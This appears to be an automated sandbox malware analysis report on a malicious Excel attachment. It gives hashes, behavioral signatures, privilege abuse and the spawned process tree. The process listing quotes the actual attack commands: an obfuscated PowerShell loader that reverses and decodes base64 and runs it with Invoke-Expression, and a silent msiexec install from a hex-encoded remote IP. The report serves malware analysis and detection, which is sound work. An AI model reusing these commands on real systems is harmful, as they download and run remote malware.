Analysis
max time kernel: 184s
max time network: 194s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 03-12-2022 21:23
Behavioral task: behavioral1
Sample: Nicht bestätigt 668781.xls
Resource: win7-20220812-en
Behavioral task: behavioral2
Sample: Nicht bestätigt 668781.xls
Resource: win10v2004-20220812-en
General
Target: Nicht bestätigt 668781.xls
Size: 136KB
MD5: 42b4e867c32dac838da681c1a3d8b709
SHA1: 9e5dcce0f8c9c91ed0d4088d7c81baf103cbb2f3
SHA256: b08f0a2abfb1fdef1d37d602fbb2ce69b63c33a58655732ba5a6c3488f827e97
SHA512: 669b72b81ea18f82c86c7bc39c96729958ba876db7d95f0af02ff0263d60b60e3162be94397bbcf87a86457d7ea5b4eef475ccb616b4aa8e623cb1e1ff21a1ec
SSDEEP: 3072:/mk3hbdlylKsgqopeJBWhZFGkE+cL2NdAnMPitGv4UL24WE7pI2KLS2Ws1ttEhDd:Ok3hbdlylKsgqopeJBWhZFVE+W2NdAMa
Malware Config
Signatures
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes: powershell.exe
description | pid | pid_target | process | target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 4020 | 1748 | powershell.exe | EXCEL.EXE
Unknown use of msiexec with remote resource 1 IoCs
Processes: msiexec.exe
pid | process
2732 | msiexec.exe
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes: EXCEL.EXE
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
Enumerates system info in registry 2 TTPs 3 IoCs
Processes: EXCEL.EXE
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes: EXCEL.EXE
pid | process
1748 | EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes: powershell.exe
pid | process
4020 | powershell.exe
4020 | powershell.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes: powershell.exe, msiexec.exe, msiexec.exe
description | pid | process
Token: SeDebugPrivilege | 4020 | powershell.exe
Token: SeShutdownPrivilege | 2732 | msiexec.exe
Token: SeIncreaseQuotaPrivilege | 2732 | msiexec.exe
Token: SeSecurityPrivilege | 4176 | msiexec.exe
Token: SeCreateTokenPrivilege | 2732 | msiexec.exe
Token: SeAssignPrimaryTokenPrivilege | 2732 | msiexec.exe
Token: SeLockMemoryPrivilege | 2732 | msiexec.exe
Token: SeIncreaseQuotaPrivilege | 2732 | msiexec.exe
Token: SeMachineAccountPrivilege | 2732 | msiexec.exe
Token: SeTcbPrivilege | 2732 | msiexec.exe
Token: SeSecurityPrivilege | 2732 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 2732 | msiexec.exe
Token: SeLoadDriverPrivilege | 2732 | msiexec.exe
Token: SeSystemProfilePrivilege | 2732 | msiexec.exe
Token: SeSystemtimePrivilege | 2732 | msiexec.exe
Token: SeProfSingleProcessPrivilege | 2732 | msiexec.exe
Token: SeIncBasePriorityPrivilege | 2732 | msiexec.exe
Token: SeCreatePagefilePrivilege | 2732 | msiexec.exe
Token: SeCreatePermanentPrivilege | 2732 | msiexec.exe
Token: SeBackupPrivilege | 2732 | msiexec.exe
Token: SeRestorePrivilege | 2732 | msiexec.exe
Token: SeShutdownPrivilege | 2732 | msiexec.exe
Token: SeDebugPrivilege | 2732 | msiexec.exe
Token: SeAuditPrivilege | 2732 | msiexec.exe
Token: SeSystemEnvironmentPrivilege | 2732 | msiexec.exe
Token: SeChangeNotifyPrivilege | 2732 | msiexec.exe
Token: SeRemoteShutdownPrivilege | 2732 | msiexec.exe
Token: SeUndockPrivilege | 2732 | msiexec.exe
Token: SeSyncAgentPrivilege | 2732 | msiexec.exe
Token: SeEnableDelegationPrivilege | 2732 | msiexec.exe
Token: SeManageVolumePrivilege | 2732 | msiexec.exe
Token: SeImpersonatePrivilege | 2732 | msiexec.exe
Token: SeCreateGlobalPrivilege | 2732 | msiexec.exe
Token: SeShutdownPrivilege | 2732 | msiexec.exe
Token: SeIncreaseQuotaPrivilege | 2732 | msiexec.exe
Token: SeCreateTokenPrivilege | 2732 | msiexec.exe
Token: SeAssignPrimaryTokenPrivilege | 2732 | msiexec.exe
Token: SeLockMemoryPrivilege | 2732 | msiexec.exe
Token: SeIncreaseQuotaPrivilege | 2732 | msiexec.exe
Token: SeMachineAccountPrivilege | 2732 | msiexec.exe
Token: SeTcbPrivilege | 2732 | msiexec.exe
Token: SeSecurityPrivilege | 2732 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 2732 | msiexec.exe
Token: SeLoadDriverPrivilege | 2732 | msiexec.exe
Token: SeSystemProfilePrivilege | 2732 | msiexec.exe
Token: SeSystemtimePrivilege | 2732 | msiexec.exe
Token: SeProfSingleProcessPrivilege | 2732 | msiexec.exe
Token: SeIncBasePriorityPrivilege | 2732 | msiexec.exe
Token: SeCreatePagefilePrivilege | 2732 | msiexec.exe
Token: SeCreatePermanentPrivilege | 2732 | msiexec.exe
Token: SeBackupPrivilege | 2732 | msiexec.exe
Token: SeRestorePrivilege | 2732 | msiexec.exe
Token: SeShutdownPrivilege | 2732 | msiexec.exe
Token: SeDebugPrivilege | 2732 | msiexec.exe
Token: SeAuditPrivilege | 2732 | msiexec.exe
Token: SeSystemEnvironmentPrivilege | 2732 | msiexec.exe
Token: SeChangeNotifyPrivilege | 2732 | msiexec.exe
Token: SeRemoteShutdownPrivilege | 2732 | msiexec.exe
Token: SeUndockPrivilege | 2732 | msiexec.exe
Token: SeSyncAgentPrivilege | 2732 | msiexec.exe
Token: SeEnableDelegationPrivilege | 2732 | msiexec.exe
Token: SeManageVolumePrivilege | 2732 | msiexec.exe
Token: SeImpersonatePrivilege | 2732 | msiexec.exe
Token: SeCreateGlobalPrivilege | 2732 | msiexec.exe
Suspicious use of SetWindowsHookEx 12 IoCs
Processes: EXCEL.EXE
pid | process
1748 | EXCEL.EXE
1748 | EXCEL.EXE
1748 | EXCEL.EXE
1748 | EXCEL.EXE
1748 | EXCEL.EXE
1748 | EXCEL.EXE
1748 | EXCEL.EXE
1748 | EXCEL.EXE
1748 | EXCEL.EXE
1748 | EXCEL.EXE
1748 | EXCEL.EXE
1748 | EXCEL.EXE
Suspicious use of WriteProcessMemory 6 IoCs
Processes: EXCEL.EXE, powershell.exe
description | pid | process | target process
PID 1748 wrote to memory of 4020 | 1748 | EXCEL.EXE | powershell.exe
PID 1748 wrote to memory of 4020 | 1748 | EXCEL.EXE | powershell.exe
PID 4020 wrote to memory of 1120 | 4020 | powershell.exe | HOSTNAME.EXE
PID 4020 wrote to memory of 1120 | 4020 | powershell.exe | HOSTNAME.EXE
PID 4020 wrote to memory of 2732 | 4020 | powershell.exe | msiexec.exe
PID 4020 wrote to memory of 2732 | 4020 | powershell.exe | msiexec.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Nicht bestätigt 668781.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -windowstyle 1 -command "$best64code = \"[encoded payload omitted]\" $base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null $LoadCode = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\"$base64\")) Invoke-Expression $LoadCode"2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\HOSTNAME.EXE"C:\Windows\system32\HOSTNAME.EXE"3⤵
-
C:\Windows\system32\msiexec.exe"C:\Windows\system32\msiexec.exe" /Q /I http://0x36C2CB14:8080/Tmkngomu/FH9ZDxBqVGEDVUQzDjpoaAALAiNOZU1UAB5+ SDFDSFKLJ=!O+}i[cP61wU?TY_3g{M~Ry2l*H3⤵
- Unknown use of msiexec with remote resource
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6